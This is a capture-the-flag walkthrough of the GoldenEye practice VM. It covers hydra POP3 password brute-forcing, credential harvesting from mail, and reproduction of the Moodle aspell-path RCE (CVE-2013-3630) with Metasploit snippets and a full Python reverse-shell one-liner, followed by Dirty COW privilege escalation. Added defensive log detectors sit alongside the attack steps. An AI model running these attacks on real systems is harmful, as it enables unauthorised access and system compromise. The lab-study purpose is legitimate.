GoldenEye VM walkthrough and CVE-2013-3630 reproduction
Preface
I'm preparing for the OSCP, so I'll be working through a series of OSCP-style VMs for practice.
Machine description
I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.
I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.
I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be set up as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting.
Beta - 2018-05-02 v1 - 2018-05-04
Information gathering
nmap -sP 192.168.218.0/24
The target is found at 192.168.218.131.
nmap -sV -A 192.168.218.131
Nmap scan report for 192.168.218.131
Host is up (0.00017s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after: 2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:06:CF:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms 192.168.218.131
Browsing to port 80
The page gives a hint: with the account GOLDENEYE, brute-force /sev-home/ using a top weak-password list to log in.
Capturing the request:
GET /sev-home/sev-home/ HTTP/1.1
Host: 192.168.218.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.218.131/
Upgrade-Insecure-Requests: 1
Authorization: Basic U2V2ZXJuYXlhOkdvbGRlbkV5ZQ==
Authorization: Basic base64(username:password)
I wrote a script to generate a wordlist of header values and fed it to Intruder, with no result.
import base64

url = 'http://192.168.218.131/sev-home/'
dic = 'F:/创新实践/dictionary/Web-Fuzzing-Box-main/Brute/Password/Top_Dev_Password.txt'
name = 'GOLDENEYE'

# Write one "Basic <base64(username:password)>" header value per candidate password
with open(dic, 'r') as f1:
    with open('goldeneye.txt', 'a') as f2:
        for line in f1:
            passwd = line.strip()
            plaintext = name + ':' + passwd
            ciphertext = base64.b64encode(plaintext.encode())
            auth = 'Basic ' + ciphertext.decode()
            f2.write(auth)
            f2.write('\n')
Back on the page, I viewed the source. There is a terminal.js whose comment section reads:
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
The password is HTML-entity encoded; decoding it gives InvincibleHack3r.
Trying Boris with that password: the login succeeds with the username in lowercase, boris.
After logging in there is another block of text:
# GoldenEye
GoldenEye is a Top Secret Soviet orbital weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)
Please email a qualified GNO supervisor to receive the online **GoldenEye Operators Training** to become an Administrator of the GoldenEye system
Remember, since ***security by obscurity*** is very effective, we have configured our pop3 service to run on a very high non-default port
The source contains a comment mentioning Natalya and Boris, the same two names as before.
From the text, the next step is to email a supervisor, and the POP3 service sits on a high port.
Scan all ports with nmap again:
nmap -sV -p- 192.168.218.131
Nmap scan report for 192.168.218.131
Host is up (0.00050s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open ssl/pop3 Dovecot pop3d
55007/tcp open pop3 Dovecot pop3d
MAC Address: 00:0C:29:06:CF:07 (VMware)
The question now: what attack techniques apply to the two mail protocols, SMTP and POP3?
A quick search gives two: forging mail through SMTP, and brute-forcing POP3. The main problem with forged mail is that we don't know the supervisor's address (supervisor@GoldenEye?) or where to send it. So brute-force POP3 first.
I tried Metasploit's pop3_login module against boris, but it felt too slow. Switching to hydra.
(First I checked where Kali keeps its wordlists.)
hydra -s 55007 -l boris -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3
hydra -s 55007 -l natalya -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3
Results:
boris secret1!
natalya bird
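A hydra run like the one above leaves a very recognisable trail on the server. The following detector is an added example, not part of the original post: it reads Dovecot-style pop3-login "auth failed" lines (the sample lines are constructed to mirror the run above, not copied from the target) and reports any source address that fails authentication more than a threshold number of times inside a sliding window, together with the usernames it tried. The threshold and window are assumptions chosen for the sample.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed lines in the style of Dovecot pop3-login "auth failed" messages,
# modelled on the hydra run against boris and natalya. Not a real capture.
SAMPLE_SYSLOG = """\
Mar  1 10:00:01 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<boris>, method=PLAIN, rip=192.168.218.129, lip=192.168.218.131
Mar  1 10:00:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<boris>, method=PLAIN, rip=192.168.218.129, lip=192.168.218.131
Mar  1 10:00:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<xenia>, method=PLAIN, rip=192.168.218.50, lip=192.168.218.131
Mar  1 10:00:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<boris>, method=PLAIN, rip=192.168.218.129, lip=192.168.218.131
Mar  1 10:00:04 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<natalya>, method=PLAIN, rip=192.168.218.129, lip=192.168.218.131
Mar  1 10:00:05 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<natalya>, method=PLAIN, rip=192.168.218.129, lip=192.168.218.131
Mar  1 10:00:06 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<natalya>, method=PLAIN, rip=192.168.218.129, lip=192.168.218.131
Mar  1 10:00:30 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<xenia>, method=PLAIN, rip=192.168.218.50, lip=192.168.218.131
Mar  1 10:00:31 ubuntu dovecot: pop3-login: Login: user=<xenia>, method=PLAIN, rip=192.168.218.50, lip=192.168.218.131
"""

# Only failed authentications are of interest; successful "Login:" lines do not match.
FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"Disconnected \(auth failed.*?user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)"
)


def parse_auth_failure(line):
    """Return {ts, user, rip} for an auth-failure line, or None for anything else."""
    m = FAIL_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; strptime's default year is fine for relative differences
    ts = datetime.strptime(re.sub(r"\s+", " ", m["ts"]), "%b %d %H:%M:%S")
    return {"ts": ts, "user": m["user"], "rip": m["rip"]}


def detect_pop3_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Map each remote IP that reached `threshold` failures within `window`
    to the sorted list of usernames it tried in that window."""
    recent = defaultdict(deque)   # rip -> (ts, user) events still inside the window
    alerts = {}
    for line in lines:
        ev = parse_auth_failure(line)
        if ev is None:
            continue
        q = recent[ev["rip"]]
        q.append((ev["ts"], ev["user"]))
        while q and ev["ts"] - q[0][0] > window:   # drop events that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts[ev["rip"]] = sorted({user for _, user in q})
    return alerts


if __name__ == "__main__":
    for rip, users in detect_pop3_bruteforce(SAMPLE_SYSLOG.splitlines()).items():
        print(f"possible POP3 brute force from {rip}, users tried: {', '.join(users)}")
```

Two failed logins from 192.168.218.50 stay below the threshold, so only the attacker box is reported. Moving the service to port 55007 did nothing to stop this; a lockout or rate limit on failed authentications (fail2ban in front of Dovecot, for example) would have.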
Now try logging into POP3. The common commands are:
Command | Argument | State | Description |
---|---|---|---|
USER | Username | Authorization | Together with the PASS command below, success causes a state transition |
PASS | Password | Authorization | If successful, the state changes to Update |
APOP | Name, Digest | Authorization | Digest is an MD5 message digest |
STAT | None | Transaction | Asks the server to return statistics about the mailbox, such as the total number of messages and total size in bytes |
UIDL | [Msg#] (message number, likewise below) | Transaction | Returns the unique identifier of a message; each identifier is unique within a POP3 session |
LIST | [Msg#] | Transaction | Returns the unique identifier of a message; each identifier is unique within a POP3 session |
RETR | [Msg#] | Transaction | Returns the full text of the message identified by the argument |
DELE | [Msg#] | Transaction | The server marks the message identified by the argument as deleted; the deletion is carried out by QUIT |
TOP | [Msg#] | Transaction | The server returns the headers plus the first n lines of the message identified by the argument; n must be a positive integer |
NOOP | None | Transaction | The server returns a positive response; used to test that the connection is working |
QUIT | None | Transaction, Authorization | *1)* If the server is in the Transaction state, it enters the Update state to delete any messages marked for deletion and then returns to the Authorization state. *2)* If the server is in the Authorization state, the session ends and the connection is closed |
boris has 3 messages:
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: root@127.0.0.1.goldeneye
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: 20180425022326.D9E47454B1@ubuntu
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: natalya@ubuntu
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: 20180425024249.C3F2B454B1@ubuntu
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu
Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: alec@janus.boss
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: 20180425025235.4B9F4454B1@ubuntu
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss
Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
Switching to the user Natalya (the username has to be capitalised when logging in, though for some reason hydra worked with lowercase too); there are two messages:
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: root@ubuntu
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: 20180425024542.D5EDA454B1@ubuntu
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: root@ubuntu
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: 20180425031956.17C96454B1@ubuntu
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
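The LIST and RETR exchanges above are multi-line POP3 responses: a status line, payload lines, and a line containing a single "." as terminator, with any payload line that itself begins with "." sent byte-stuffed as "..". The parser below is an added example and not part of the original post; the two responses it parses are constructed to mirror the boris mailbox above (shortened, and with one byte-stuffed line added to exercise that case), not byte-for-byte server output.

```python
from email.parser import Parser

# Constructed responses in the shape of the LIST / RETR exchanges above
# (shortened; not byte-for-byte the server output from the target).
LIST_RESPONSE = "+OK 3 messages:\r\n1 544\r\n2 373\r\n3 921\r\n.\r\n"

RETR_RESPONSE = (
    "+OK 921 octets\r\n"
    "Return-Path: alec@janus.boss\r\n"
    "X-Original-To: boris\r\n"
    "Delivered-To: boris@ubuntu\r\n"
    "Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\r\n"
    "From: alec@janus.boss\r\n"
    "\r\n"
    "Boris,\r\n"
    "..Attached are the final access codes.\r\n"   # byte-stuffed: the real line starts with one '.'
    ".\r\n"
)


def split_multiline(raw):
    """Split a multi-line POP3 response into (status line, payload lines).

    Raises ValueError on a -ERR status or a missing terminator, and un-stuffs
    lines the server prefixed with an extra '.' (RFC 1939, section 3).
    """
    status, sep, rest = raw.partition("\r\n")
    if not sep or not status.startswith("+OK"):
        raise ValueError(f"unexpected status line: {status!r}")
    lines = []
    for line in rest.split("\r\n"):
        if line == ".":            # termination octet on a line by itself
            return status, lines
        lines.append(line[1:] if line.startswith("..") else line)
    raise ValueError("response not terminated by '.'")


def parse_list(raw):
    """LIST -> {message number: size in octets}."""
    _, lines = split_multiline(raw)
    sizes = {}
    for line in lines:
        num, size = line.split()
        sizes[int(num)] = int(size)
    return sizes


def parse_retr(raw):
    """RETR -> (headers dict, body text), using the stdlib RFC 822 parser."""
    _, lines = split_multiline(raw)
    msg = Parser().parsestr("\n".join(lines))
    return dict(msg.items()), msg.get_payload()


if __name__ == "__main__":
    print(parse_list(LIST_RESPONSE))
    headers, body = parse_retr(RETR_RESPONSE)
    print(headers["From"], "->", headers["X-Original-To"])
    print(body)
```

The terminator check matters: a client that stops reading at the first blank line or at the declared octet count will mis-read a message whose body starts with ".", and a server that forgets to byte-stuff lets a message body end the response early.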
From the clues gathered so far there is a new system. Map the target IP to severnaya-station.com in the hosts file.
Browse to http://severnaya-station.com/gnocertdir
After logging in, Wappalyzer identifies it as Moodle. The Site blogs tab reveals version 2.2.3.
Clicking Messages shows a conversation with Dr Doak that mentions the mail account doak, so brute-force that one too. While waiting, search for public Moodle vulnerabilities.
Log into the mailbox and have a look.
We get an account. Together with the earlier search I suspected the teacher-role RCE (CVE-2018-1133), but the version doesn't match.
Log in and browse around first: in My private files there is s3cret.txt
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
The image is below; zooming in, the English text roughly says that an access key is hidden.
Analysing it:
The base64 segment decodes to xWinter1995x!; logging in as admin with it succeeds.
Foothold: getting a shell
Now to get a shell. Looking further through exploit-db, there is a 2013 RCE that also has a Metasploit exploit. But the OSCP only allows msf on a single machine, and skimming the exploit it is only about three steps, so for practice we'll first follow the exploit's flow by hand (truthfully, msf didn't get through).
1. Change the spell engine
Change the Spell engine as in the screenshot above; the second setting does not need to be changed.
2. Insert the payload
post = {
  'section' => 'systempaths',
  'sesskey' => sesskey,
  'return' => '',
  's__gdversion' => '2',
  's__pathtodu' => '/usr/bin/du',
  's__aspellpath' => payload.encoded,
  's__pathtodot' => ''
}
aspell = send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, '/admin/settings.php'),
  'vars_post' => post,
  'cookie' => sess
})
spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'
print_status("Triggering payload")
First find the page /admin/settings.php?section=systempaths
The code already present in that field: I'm not sure whether it's a hint or a leftover from my earlier unsuccessful msf attempt.
Enter a Python reverse-shell one-liner:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.218.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
3. Trigger the vulnerability
spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'
print_status("Triggering payload")
resp = send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, '/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php'),
  'data' => spellcheck,
  'ctype' => 'application/json',
  'cookie' => sess
})
if !resp or resp.code != 200
  fail_with("Error triggering payload")
end
Browse to http://severnaya-station.com/gnocertdir/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php and send the exploit's trigger body with HackBar.
We receive the reverse shell.
Post-exploitation: privilege escalation
As usual, start by looking for SUID binaries:
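The three steps above leave a distinctive pair of requests in the web server's access log: a POST to admin/settings.php?section=systempaths (rewriting the aspell path) followed shortly by a POST to the TinyMCE spellchecker rpc.php (running it). The script below is an added example, not part of the original post or of the Metasploit module: it correlates those two requests per source address over Apache combined-log lines. The sample lines are constructed to match the walkthrough's lab addresses and paths, not taken from the target, and the 30-minute window is an assumption.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-log lines modelled on the exploit steps above
# (not a real capture; the addresses are this lab's attacker and two other hosts).
SAMPLE_LOG = """\
192.168.218.129 - - [01/Mar/2021:10:00:01 +0800] "GET /gnocertdir/admin/settings.php?section=systempaths HTTP/1.1" 200 9124 "-" "Mozilla/5.0"
192.168.218.129 - - [01/Mar/2021:10:00:40 +0800] "POST /gnocertdir/admin/settings.php?section=systempaths HTTP/1.1" 303 - "-" "Mozilla/5.0"
192.168.218.50 - - [01/Mar/2021:10:01:02 +0800] "POST /gnocertdir/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"
192.168.218.129 - - [01/Mar/2021:10:02:15 +0800] "POST /gnocertdir/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
192.168.218.77 - - [01/Mar/2021:11:30:00 +0800] "POST /gnocertdir/admin/settings.php?section=systempaths HTTP/1.1" 303 - "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Step 2 rewrites the aspell path on this settings page; step 3 runs it through this endpoint.
SETTINGS_RE = re.compile(r"/admin/settings\.php\?(?:.*&)?section=systempaths(?:&|$)")
SPELL_RPC_RE = re.compile(r"/plugins/spellchecker/rpc\.php(?:\?|$)")


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_systempaths_rce_sequences(lines, window=timedelta(minutes=30)):
    """Flag every source that POSTs to the system-paths settings page and then,
    within `window`, POSTs to the TinyMCE spellchecker RPC endpoint."""
    last_settings_post = {}   # ip -> time of its most recent system-paths POST
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if SETTINGS_RE.search(rec["path"]):
            last_settings_post[rec["ip"]] = rec["ts"]
        elif SPELL_RPC_RE.search(rec["path"]):
            t0 = last_settings_post.get(rec["ip"])
            if t0 is not None and rec["ts"] - t0 <= window:
                alerts.append({"ip": rec["ip"], "settings_post": t0, "spellcheck_post": rec["ts"]})
    return alerts


if __name__ == "__main__":
    for a in find_systempaths_rce_sequences(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']}: system paths changed at {a['settings_post']:%H:%M:%S}, "
              f"spellchecker called at {a['spellcheck_post']:%H:%M:%S}")
```

In the sample only 192.168.218.129 produces the pair; the host that used the spellchecker without touching the settings page and the one that edited the settings page without calling rpc.php are left alone. An administrator can legitimately do both, so treat a hit as a triage signal to check what the aspell path was set to, and note that the signal disappears once Moodle is patched and the spellchecker no longer shells out to an admin-supplied path.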
find / -perm -u=s -type f 2>/dev/null
Start a Python HTTP server locally, fetch Linux Exploit Suggester 2 on the target with wget, make it executable and run it.
Upload Dirty COW.
There is no gcc, so compile with cc and run:
cc cowroot.c -o cowroot -pthread
./cowroot
Then ls /root hung... and the website stopped responding. Great, that crashed the box outright.
After several setbacks I finally got root with https://www.exploit-db.com/exploits/37292
568628e0d993b1973adc718237da6e93
Summary
The main takeaway this time was attacking the POP3 mail protocol. Getting a shell was routine, but done without msf; the exploit's steps are clear enough that it isn't needed. After getting the shell, privilege escalation took far more effort than expected.